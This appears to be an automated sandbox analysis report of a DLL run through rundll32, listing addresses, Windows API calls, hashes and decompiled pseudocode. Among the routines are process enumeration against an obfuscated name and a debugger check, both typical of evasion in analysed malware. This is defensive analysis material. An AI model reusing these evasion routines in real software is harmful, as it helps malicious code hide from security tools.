0x00c27348
0x00c27355
0x00c27355
0x00c27360
0x00c27362
0x00c2736c
0x00c27371
0x00c27371
0x00c2736c
0x00c27378
0x00c2738e
0x00c2737a
0x00c2737a
0x00c27387
0x00c27387
0x00c27392
0x00c27394
0x00c2739e
0x00c273a3
0x00c273a3
0x00c2739e
0x00c273aa
0x00c273c0
0x00c273ac
0x00c273ac
0x00c273b9
0x00c273b9
0x00c273c4
0x00c273c6
0x00c273d0
0x00c273d5
0x00c273d5
0x00c273d0
0x00c273dc
0x00c273f2
0x00c273de
0x00c273de
0x00c273eb
0x00c273eb
0x00c273f6
0x00c27409
0x00c27409
0x00000000
0x00c273f8
0x00c273f8
0x00c27402
0x00000000
0x00c27413
0x00c27413
0x00c27415
0x00c2742b
0x00c27417
0x00c27417
0x00c27424
0x00c27424
0x00c2742f
0x00c27431
0x00c27434
0x00c27435
0x00c2743c
0x00c2743e
0x00c2743f
0x00c2743f
0x00c2743c
0x00c27446
0x00c2745c
0x00c27448
0x00c27448
0x00c27455
0x00c27455
0x00c27460
0x00c2746e
0x00c27478
0x00c27478
0x00c2747d
0x00c27483
0x00c27490
0x00c27496
0x00c2749c
0x00c274a1
0x00c274a7
0x00000000
0x00c274a7
0x00c27402
0x00c273f6

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00C24540,?,00C24540,69B25F44,?,?,69B25F44,00C24540,?,69B25F44,E8FA7DD7,00C2A00C,7742C740), ref: 00C27304
StrToIntExA.SHLWAPI(00000000,00000000,00C24540,?,00C24540,69B25F44,?,?,69B25F44,00C24540,?,69B25F44,E8FA7DD7,00C2A00C,7742C740), ref: 00C27336
StrToIntExA.SHLWAPI(00000000,00000000,00C24540,?,00C24540,69B25F44,?,?,69B25F44,00C24540,?,69B25F44,E8FA7DD7,00C2A00C,7742C740), ref: 00C27368
StrToIntExA.SHLWAPI(00000000,00000000,00C24540,?,00C24540,69B25F44,?,?,69B25F44,00C24540,?,69B25F44,E8FA7DD7,00C2A00C,7742C740), ref: 00C2739A
StrToIntExA.SHLWAPI(00000000,00000000,00C24540,?,00C24540,69B25F44,?,?,69B25F44,00C24540,?,69B25F44,E8FA7DD7,00C2A00C,7742C740), ref: 00C273CC
StrToIntExA.SHLWAPI(00000000,00000000,00C24540,?,00C24540,69B25F44,?,?,69B25F44,00C24540,?,69B25F44,E8FA7DD7,00C2A00C,7742C740), ref: 00C273FE
HeapFree.KERNEL32(00000000,?,?,00C24540,69B25F44,?,?,69B25F44,00C24540,?,69B25F44,E8FA7DD7,00C2A00C,7742C740), ref: 00C274A1
HeapFree.KERNEL32(00000000,?,?,00C24540,69B25F44,?,?,69B25F44,00C24540,?,69B25F44,E8FA7DD7,00C2A00C,7742C740), ref: 00C274B4

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c09f05f71292078cfd69b356cd6de2afc26c070257334c4e7750146a8795f628
Instruction ID: 01990205b6a78828f1a896edba03dc85eefa568834e5fdc061dc166a85c1c5b6
Opcode Fuzzy Hash: c09f05f71292078cfd69b356cd6de2afc26c070257334c4e7750146a8795f628
Instruction Fuzzy Hash: A371B874A14124EBC720EB75ECC4E6F77FDBB48700B240A65E416D7921EA31DE01AB21

Uniqueness

Uniqueness Score: -1.00%

Function 7034E213, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,14p,00000002,00000000,?,?,?,7034E531,?,00000000), ref: 7034E2AC
GetLocaleInfoW.KERNEL32(?,20001004,14p,00000002,00000000,?,?,?,7034E531,?,00000000), ref: 7034E2D5
GetACP.KERNEL32(?,?,7034E531,?,00000000), ref: 7034E2EA

Strings

14p, xrefs: 7034E2C6, 7034E2E3, 7034E29D, 7034E2B6, 7034E2A0, 7034E2C9
OCP, xrefs: 7034E267
ACP, xrefs: 7034E231

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID: 14p$ACP$OCP
API String ID: 2299586839-2808346673
Opcode ID: d559a8971bf3d1f20f6381b4200eeddf4a58c7ef22b6c770779cc227f0bd39b9
Instruction ID: 7b9e46c48b6b92502a3ae89997f0d04b705f7e291dbdc25abe09268124c5503a
Opcode Fuzzy Hash: d559a8971bf3d1f20f6381b4200eeddf4a58c7ef22b6c770779cc227f0bd39b9
Instruction Fuzzy Hash: 6E219222600101AAE716AF65C940BAF77FFAF44A58B63AE28F907DF104E7B2DD40C750

Uniqueness

Uniqueness Score: -1.00%

Function 7034DA85, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 70344589: GetLastError.KERNEL32(?,?,?,70340192), ref: 7034458E
Part of subcall function 70344589: SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70340192), ref: 7034462C

GetACP.KERNEL32(?,?,?,?,?,?,7034660C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 7034DB46
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7034660C,?,?,?,00000055,?,-00000050,?,?), ref: 7034DB71
_wcschr.LIBVCRUNTIME ref: 7034DC05
_wcschr.LIBVCRUNTIME ref: 7034DC13
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7034DCD4

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: a95c80d9fa8f21d6816628c599aa4f5b8dd9e850fcf271ea742101cbb68aee2d
Instruction ID: 7f4842d37a2cd02406a5c28c0ca95cd05988ff47b34d21cf0292eb902dce4c53
Opcode Fuzzy Hash: a95c80d9fa8f21d6816628c599aa4f5b8dd9e850fcf271ea742101cbb68aee2d
Instruction Fuzzy Hash: FC71DF72600202AAE755AB35CD86BBE77FDEF45710F126429F906DF180EAB4ED41C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 7034E3E8, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 70344589: GetLastError.KERNEL32(?,?,?,70340192), ref: 7034458E
Part of subcall function 70344589: SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70340192), ref: 7034462C

Part of subcall function 70344589: _free.LIBCMT ref: 703445EB
Part of subcall function 70344589: _free.LIBCMT ref: 70344621

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 7034E4F4
IsValidCodePage.KERNEL32(00000000), ref: 7034E53D
IsValidLocale.KERNEL32(?,00000001), ref: 7034E54C
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 7034E594
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 7034E5B3

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 6da024b2c3bbc926203fd23f1888bfe20161e5334bc322c020601812edac301a
Instruction ID: 78530c00d355321058e4208a4d3d0dc0c897ec727c1499ee07905ddb4eaec9dc
Opcode Fuzzy Hash: 6da024b2c3bbc926203fd23f1888bfe20161e5334bc322c020601812edac301a
Instruction Fuzzy Hash: 68517F72900205AFEB00DFA6CC45ABE77F8BF15709F115669F512EF250EBB0E9418B61

Uniqueness

Uniqueness Score: -1.00%

Function 70332495, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70332495(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x703341f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x70334240 = 1;
										__eflags =  *0x70334240;
										if( *0x70334240 != 0) {
											goto L60;
										}
										_t84 =  *0x703341f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x70334240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x703341f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x70334200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x703341fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x70334200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x70334200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x70334240 = 1;
							__eflags =  *0x70334240;
							if( *0x70334240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x70334200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x70334200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x70334240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x70334200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x703341f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x70334200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x70334200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x7033249f
0x703324a2
0x703324a8
0x703324c6
0x00000000
0x703324c6
0x703324b0
0x703324b9
0x703324bf
0x703324ce
0x703324d1
0x703324d4
0x703324de
0x703324de
0x703324e0
0x703324e3
0x703324e5
0x703324e5
0x703324e7
0x703324ea
0x00000000
0x00000000
0x703324ec
0x703324ee
0x70332554
0x70332554
0x703326b2
0x00000000
0x703326b2
0x703324f0
0x703324f0
0x703324f4
0x703324f6
0x703324f6
0x703324f6
0x703324f6
0x703324f9
0x703324fa
0x703324fd
0x703324fd
0x70332501
0x70332505
0x70332513
0x70332513
0x7033251b
0x70332521
0x70332523
0x70332525
0x70332535
0x70332542
0x70332546
0x7033254b
0x7033254d
0x703325cb
0x703325cb
0x7033254f
0x7033254f
0x7033254f
0x703325cd
0x703325cf
0x703326b0
0x703326b0
0x00000000
0x703325d5
0x703325d5
0x703325dc
0x00000000
0x00000000
0x703325e2
0x703325e6
0x70332642
0x70332644
0x7033264c
0x7033264e
0x70332650
0x00000000
0x00000000
0x70332652
0x70332658
0x7033265a
0x7033265c
0x70332671
0x70332671
0x70332673
0x703326a2
0x703326a9
0x00000000
0x703326a9
0x70332677
0x70332678
0x7033267a
0x7033267c
0x7033267c
0x7033267e
0x70332680
0x70332682
0x70332696
0x70332696
0x70332699
0x7033269b
0x7033269b
0x7033269c
0x7033269c
0x00000000
0x70332684
0x70332684
0x70332684
0x7033268d
0x7033268e
0x70332690
0x70332692
0x70332692
0x00000000
0x70332684
0x70332682
0x7033265e
0x70332665
0x70332665
0x70332667
0x00000000
0x00000000
0x70332669
0x7033266a
0x7033266d
0x7033266f
0x00000000
0x00000000
0x00000000
0x7033266f
0x00000000
0x70332665
0x703325e8
0x703325eb
0x703325f0
0x00000000
0x00000000
0x703325f9
0x703325fb
0x70332601
0x00000000
0x00000000
0x70332607
0x7033260d
0x00000000
0x00000000
0x70332613
0x70332615
0x7033261e
0x70332622
0x00000000
0x00000000
0x70332628
0x7033262b
0x7033262d
0x00000000
0x00000000
0x70332634
0x70332636
0x00000000
0x00000000
0x70332638
0x7033263c
0x00000000
0x00000000
0x00000000
0x7033263c
0x00000000
0x00000000
0x00000000
0x70332527
0x70332527
0x70332527
0x7033252e
0x00000000
0x00000000
0x70332530
0x70332531
0x70332533
0x00000000
0x00000000
0x00000000
0x70332533
0x7033255b
0x7033255d
0x00000000
0x00000000
0x7033256d
0x7033256f
0x70332571
0x00000000
0x00000000
0x70332577
0x7033257e
0x703325aa
0x703325aa
0x703325ac
0x703325ae
0x703325c2
0x703325c4
0x00000000
0x00000000
0x00000000
0x00000000
0x703325b0
0x703325b0
0x703325b0
0x703325b9
0x703325ba
0x703325bc
0x703325be
0x703325be
0x00000000
0x703325b0
0x70332580
0x70332583
0x70332585
0x70332597
0x70332597
0x7033259a
0x7033259c
0x7033259c
0x7033259d
0x7033259d
0x703325a3
0x00000000
0x00000000
0x00000000
0x00000000
0x70332587
0x70332587
0x70332587
0x7033258e
0x00000000
0x00000000
0x70332590
0x70332590
0x70332591
0x00000000
0x00000000
0x00000000
0x70332591
0x70332593
0x70332595
0x703325a8
0x00000000
0x00000000
0x00000000
0x703325a8
0x00000000
0x70332595
0x70332507
0x7033250a
0x7033250d
0x00000000
0x00000000
0x7033250f
0x70332511
0x00000000
0x00000000
0x00000000
0x70332511
0x703324d6
0x703324d8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 70332546

Strings

@B3p, xrefs: 703326A4
@B3p, xrefs: 70332647
@B3p, xrefs: 70332565

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: @B3p$@B3p$@B3p
API String ID: 2850889275-3377878969
Opcode ID: 41833e9178e9642640eac2d262e3486b273b42eb40a0ac132e3173d0da323725
Instruction ID: 0f39236189b3e6e53eb0b5d69c4788f7fbcbe8902346c3f719cd79cc22a64132
Opcode Fuzzy Hash: 41833e9178e9642640eac2d262e3486b273b42eb40a0ac132e3173d0da323725
Instruction Fuzzy Hash: 4C61B4316006069FE706CF2AD9E1E5DF3BAAF85314FB2852DE417C7294E7B0ED828650

Uniqueness

Uniqueness Score: -1.00%

Function 00C22102, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00C22102() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xc2a2d4; // 0x449d5a8
						_t2 = _t9 + 0xc2bde4; // 0x73617661
						_push( &_v264);
						if( *0xc2a118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00c2210d
0x00c22117
0x00c2211b
0x00c22125
0x00c22156
0x00c2212c
0x00c22131
0x00c2213e
0x00c22147
0x00c2215e
0x00c22149
0x00c22151
0x00000000
0x00c22151
0x00c2215f
0x00c22160
0x00000000
0x00c22160
0x00000000
0x00c2215a
0x00c22166
0x00c2216b

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C22112
Process32First.KERNEL32(00000000,?), ref: 00C22125
Process32Next.KERNEL32(00000000,?), ref: 00C22151
CloseHandle.KERNEL32(00000000), ref: 00C22160

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5badbbf1145310bf08c61e44b2e81b57b7ebaf046bf41fec0d040855f93dfc57
Instruction ID: f98aa7ab8570924666a866d924ddd97084c4488aa6bb56277ff4c0289edcec60
Opcode Fuzzy Hash: 5badbbf1145310bf08c61e44b2e81b57b7ebaf046bf41fec0d040855f93dfc57
Instruction Fuzzy Hash: EAF0963110113477D720A666AD49FEF77ACDBC5310F000191FA19C2501EB349E6646A1

Uniqueness

Uniqueness Score: -1.00%

Function 70331F7C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E70331F7C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x703341b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x703341bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x703341ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x703341a8 = _t5;
					 *0x703341b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x703341a4 = _t6;
					if(_t6 == 0) {
						 *0x703341a4 =  *0x703341a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x70331f7d
0x70331f8b
0x70331f93
0x70331f98
0x70331fe2
0x70331fe2
0x70331f9a
0x70331fa2
0x70331fde
0x70331fe0
0x70331fa4
0x70331fa4
0x70331fa9
0x70331fb7
0x70331fbc
0x70331fc2
0x70331fca
0x70331fcf
0x70331fd1
0x70331fd1
0x70331fdb
0x70331fdb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,70331512,74B063F0,00000000), ref: 70331F8B
GetVersion.KERNEL32 ref: 70331F9A
GetCurrentProcessId.KERNEL32 ref: 70331FA9
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 70331FC2

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 8f9d8a1923e2708e5dbb9eac36e8f4ae75cc852f8ea9bd77b440a82cf9b3d65c
Instruction ID: 890a795ba4941bd54597fadced2c84ce2597828eca7d94e6b18765c8a68bbebf
Opcode Fuzzy Hash: 8f9d8a1923e2708e5dbb9eac36e8f4ae75cc852f8ea9bd77b440a82cf9b3d65c
Instruction Fuzzy Hash: 26F01773A48610AEF3549F6BACC9745FBACA714712F31811AF106CA1E0D3F464818B54

Uniqueness

Uniqueness Score: -1.00%

Function 70340D8D, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 70340E85
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 70340E8F
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 70340E9C

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 595a14ac1f32d2a2944e18919b88a7720d04e1db397ea83510b51cde0836cb0f
Instruction ID: e471233228eca3d0f4554c889163cb4995321358a7dabbef69ea5a88c29f5ab4
Opcode Fuzzy Hash: 595a14ac1f32d2a2944e18919b88a7720d04e1db397ea83510b51cde0836cb0f
Instruction Fuzzy Hash: 7531D5759013289BCB21DF65D889BDDBBB8BF08310F5051EAE91CAA260E7709B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 703311BF, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E703311BF(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x703311c3
0x703311d4
0x703311dc
0x703311de
0x703311f1
0x703311f1
0x703311fb

APIs

GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,703319A8,?,70331576,?,00000000,00000001,?,?,?,70331576), ref: 703311D4
GetSystemDefaultUILanguage.KERNEL32(?,?,703319A8,?,70331576,?,00000000,00000001,?,?,?,70331576), ref: 703311DE
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,703319A8,?,70331576,?,00000000,00000001,?,?,?,70331576), ref: 703311F1

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 276d30946ea2386a55381bf621a51f6ddc11a16fc870f7de633ed9665130afc7
Instruction ID: 43ec65453f6ab46b779818fc4b95efc22e6d82117d4a5dbcad9317226020a66f
Opcode Fuzzy Hash: 276d30946ea2386a55381bf621a51f6ddc11a16fc870f7de633ed9665130afc7
Instruction Fuzzy Hash: 4AE04F64A40248BAE704D7A28D46FBEB3BCAB0070AF500244FB02E61D0D6B89E04E729

Uniqueness

Uniqueness Score: -1.00%

Function 70342485, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,70342484,?,?,?,?), ref: 703424A7
TerminateProcess.KERNEL32(00000000,?,70342484,?,?,?,?), ref: 703424AE
ExitProcess.KERNEL32 ref: 703424C0

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b308785f17a99fd21c27188267ea7f9d0c8a5ab1faa3baecbe5502672fd6cefb
Instruction ID: 662e8335503cdec10a554b0c4af8dde9996a9336c6cdd6ad6ef71e5780536f96
Opcode Fuzzy Hash: b308785f17a99fd21c27188267ea7f9d0c8a5ab1faa3baecbe5502672fd6cefb
Instruction Fuzzy Hash: A7E0B632440648EFDB026B56CD99E5D7FBDFB40241B526424FA0A9E231DB79ED82CA90

Uniqueness

Uniqueness Score: -1.00%

Function 70350770, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 581COMMON

Download Yara Rule

